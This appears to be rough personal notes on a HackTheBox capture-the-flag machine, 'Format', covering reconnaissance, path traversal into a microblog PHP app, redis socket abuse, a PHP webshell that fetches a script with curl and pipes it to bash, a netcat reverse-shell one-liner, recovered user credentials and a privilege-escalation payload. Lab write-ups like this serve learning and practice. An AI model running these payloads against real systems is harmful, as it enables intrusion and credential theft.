CTF format

CTFHackTheBox

nmap

1
nmap -sV -p- 10.10.11.213 -T5

/etc/hosts

got a redirection.

add app.microblog.htb to /etc/hosts

1
2
➜  ~ tail -1 /etc/hosts 
10.10.11.213    format format.htb app.microblog.htb microblog.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c397ce837d255d5dedb545cdf20b054f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC58JQV36v8AqpQB6tJC5upH5YdXw4LMaUJ4Exx+H6PjPZDab5MSx7Zm1oA1DWewM8tmU8fcprIxykYA8Z66Sd5ll/M1WntYO1b3LxxA0kI9F3yXQU+D2LMV6dGsqalJ80WWYcowlt3hZie6gnz4qEDj7ijCFi5h8K4R2rKtA16sH4FC9EQQU7qgN4WkE7uJSJS/6tWREtV/PspxsiMSBhUE0BreHurM6eaTZGa0VHOyNpbsZ3KXDro0fIOlfovRJVdAwWXF740M+X3aVngS9p1+XrnsVIqcL9T7GdU6H2Tyl5JvnGLdOr2Etd9NW41f+g+RYl7QY6WYbX+30racRmcTUtH4DODyeDXazi6fRUiXBI8pXkD3oLMBSxXsbeGT8Ja3LECPTybIl/jH3KRfl46P7TIUYZ2kqTZqxJ1B6klyZY+woh24UPDrZu/rW9JMaBz2tg97tAiLR8pLZxLrpVH7YmV8vXk2Sgo1rEuqKhBAK98bQuAsbocbjiyrKYAACc=
|   256 b3aa30352b997d20feb6758840a517c1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxL4FuxiK0hKkwexmffoZfwAs+0TzHjqgv3sbokWQzlt+YGLBXHmGuLjgjfi9Ir49zbxEL6iAOv8/Mj8hUPQVk=
|   256 fab37d6e1abcd14b68edd6e8976727d7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK9eUks4+f4DtePOKRJYzDggTf1cOpMhtAxXHGSqr5ng
80/tcp   open  http    syn-ack nginx 1.18.0
|_http-title: 404 Not Found
|_http-server-header: nginx/1.18.0
3000/tcp open  http    syn-ack nginx 1.18.0
|_http-title:  Microblog
|_http-favicon: Unknown favicon MD5: F6E1A9128148EEAD9EFF823C540EF471
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port:

  • 22 ssh
  • 80 nginx/1.18.0
  • 3000 Microblog

subdomain

1
wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/general/big.txt -u 'http://microblog.htb' -H 'Host: FUZZ.microblog.htb' --hw 11
1
2
3
4
5
6
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                     
=====================================================================

000000212:   200        83 L     306 W      3973 Ch     "app"                                                                                       
000002625:   200        42 L     434 W      3731 Ch     "sunny"

add sunny.microblog.htb to /etc/hosts

app.microblog.htb

Login form

1
http://app.microblog.htb/login/

Register with peanut:peanut

1
feroxbuster --url http://app.microblog.htb/ -x php, aspx

sunny.microblog.htb

1
feroxbuster --url http://sunny.microblog.htb/ -x php, aspx

Create my own website with microblog


I just add a text in the text area, but I also have an id number

1
2
id=${7*7}&txt=${7*7}
id=../../../../../../etc/passwd&txt=${7*7}
1
2
root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:
daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:999:999:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:\/:\/usr\/sbin\/nologin\ncooper:x:1000:1000::\/home\/cooper:\/bin\/bash\nredis:x:103:33::\/var\/lib\/redis:\/usr\/sbin\/nologin\ngit:x:104:111:Git Version Control,,,:\/home\/git:\/bin\/bash\nmessagebus:x:105:112::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\n_laurel:x:997:997::\/var\/log\/laurel:\/bin\/false
1
2
/var/log/laurel
ncooper:x:1000:1000::/home/cooper

After a wile, my blog got removed, idk why.

get nginx config file

1
../../../../../../../../etc/nginx/nginx.conf
1
2
3
4
5
6
7
8
9
10
11
user www-data;\nworker_processes auto;\npid \/run\/nginx.pid;\ninclude \/etc\/nginx\/modules-enabled\/*.conf;\n\nevents {\n\tworker_connections 768;\n\t# multi_accept on;\n}\n\nhttp {

Basic Settings\n\t##\n\n\tsendfile on;\n\ttcp_nopush on;\n\ttypes_hash_max_size 2048;\n\t# server_tokens off;\n\n\t# server_names_hash_bucket_size 64;\n\t# server_name_in_redirect off;\n\n\tinclude \/etc\/nginx\/mime.types;\n\tdefault_type application\/octet-stream;

SSL Settings\n\t##\n\n\tssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE\n\tssl_prefer_server_ciphers on;

Logging Settings\n\t##\n\n\taccess_log \/var\/log\/nginx\/access.log;\n\terror_log \/var\/log\/nginx\/error.log;

Gzip Settings\n\t##\n\n\tgzip on;\n\n\t# gzip_vary on;\n\t# gzip_proxied any;\n\t# gzip_comp_level 6;\n\t# gzip_buffers 16 8k;\n\t# gzip_http_version 1.1;\n\t# gzip_types text\/plain text\/css application\/json application\/javascript text\/xml application\/xml application\/xml+rss text\/javascript;

Virtual Host Configs\n\t##\n\n\tinclude \/etc\/nginx\/conf.d\/*.conf;\n\tinclude \/etc\/nginx\/sites-enabled\/*;\n}\n\n\n#mail {\n#\t# See sample authentication script at:\n#\t# http:\/\/wiki.nginx.org\/ImapAuthenticateWithApachePhpScript\n#\n#\t# auth_http localhost\/auth.php;\n#\t# pop3_capabilities \"TOP\" \"USER\";\n#\t# imap_capabilities \"IMAP4rev1\" \"UIDPLUS\";\n#\n#\tserver {\n#\t\tlisten     localhost:110;\n#\t\tprotocol   pop3;\n#\t\tproxy      on;\n#\t}\n#\n#\tserver {\n#\t\tlisten     localhost:143;\n#\t\tprotocol   imap;\n#\t\tproxy      on;\n#\t}\n#}\n

Broke it again, let’s see the port 3000

port 3000


Interesting files

http://microblog.htb:3000/cooper/microblog/src/branch/main/microblog/app/dashboard/index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
function addSite($site_name) {
    if(isset($_SESSION['username'])) {
        //check if site already exists
        $scan = glob('/var/www/microblog/*', GLOB_ONLYDIR);
        $taken_sites = array();
        foreach($scan as $site) {
            array_push($taken_sites, substr($site, strrpos($site, '/') + 1));
        }
        if(in_array($site_name, $taken_sites)) {
            header("Location: /dashboard?message=Sorry, that site has already been taken&status=fail");
            exit;
        }
        $redis = new Redis();
        $redis->connect('/var/run/redis/redis.sock');
	$redis->LPUSH($_SESSION['username'] . ":sites", $site_name);
        $tmp_dir = "/tmp/" . generateRandomString(7);
        system("mkdir -m 0700 " . $tmp_dir);
        system("cp -r /var/www/microblog-template/* " . $tmp_dir);
        system("chmod 500 " . $tmp_dir);
        system("chmod +w /var/www/microblog");
        system("cp -rp " . $tmp_dir . " /var/www/microblog/" . $site_name);
		system("chmod -w microblog");
		system ("chmod -R +w " . $tmp_dir);
		system("rm -r " . $tmp_dir);
        header("Location: /dashboard?message=Site added successfully!&status=success");
    }
    else {
        header("Location: /dashboard?message=Site not added, authentication failed&status=fail");
    }
}

Website directory:

  • /var/www/microblog/

This why we can do LFI, mybe we can inject a command

1
system("cp -rp " . $tmp_dir . " /var/www/microblog/" . $site_name);

bulletproff.php

https://github.com/samayo/bulletproof

Use the image upload to upload a revershell ?

Register


We can activate the pro via redis then we will be able to upload an image.

Sunny

1
2
3
4
2766wxkoacy = <div class = "blog-h1 blue-fill"><b>It's Always Sunny in Philadelphia</b></div>
jtdpx1iea5 = bunch of text
rle1v1hnms = <div class = "blog-h1 blue-fill"><b>Danny DeVito??</b></div>
syubx3wiu3e = = bunch of text

Users?

  • Danny DeVito
  • Rob McElhenney
  • John Landgraf
  • Frank Reynolds
  • McElhenney
  • Landgraf
  • DeVito
  • Reynolds

Then the orders are used like that:

1
2
3
foreach($order as $line) {
    $temp = $html_content;
    $html_content = $temp . "<div class = \"{$line}\">" . file_get_contents($line) . "</div>";

When I add header:

  • id=fl2vj81yx67&header=asd
    a text:
  • id=jghv1qnn3rj&txt=dfgdfgdfg

my user as should be able to upload something into the server
Not working, I’m not pro, need to enumerate more.
I’ve done a git clone of the repo, gitea is slow.

bucket, redis, active pro, lfi

1
2
$redis->connect('/var/run/redis/redis.sock');
$pro = $redis->HGET($_SESSION['username'], "pro");

So I don’t have to do it while I register, can do it later.
In eddit.php they check if we are pro:

1
$pro = $redis->HGET($_SESSION['username'], "pro");

I have to post this

1
2
3
$redis->HSET(trim($_POST['username']), "pro", "true");
# instead of
$redis->HSET(trim($_POST['username']), "pro", "false");

Look in burp to see what is he doing during the registration.
Nothing….

1
curl -X HSET http://microblog.htb/static/unix:%2fvar%2frun%2fredis%2fredis.sock:peanut%20pro%20true%20/

1
2
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.23 4545 >/tmp/f" > shell.sh  
python2.7 -m SimpleHTTPServer 80

in burp

1
id=/var/www/microblog/peanut/uploads/shell.php&txt=<?php system('curl http://10.10.14.23/shell.sh|bash')?>

redis

https://stackoverflow.com/questions/9445024/how-can-i-use-local-redis-client-to-connect-to-socket
form this :

1
$redis->connect('/var/run/redis/redis.sock');

To this

1
2
3
keys *
TYPE cooper.dooper
HGETALL  cooper.dooper

It’s a HASH type so I did like he mentioned:
https://stackoverflow.com/questions/37953019/wrongtype-operation-against-a-key-holding-the-wrong-kind-of-value-php

username=cooper
password=zooperdoopercooper

root

1
(root) /usr/bin/license

Watch the code then 

1
HMSET test first-name "{license.__init__.__globals__[secret_encoded]}" last-name test username test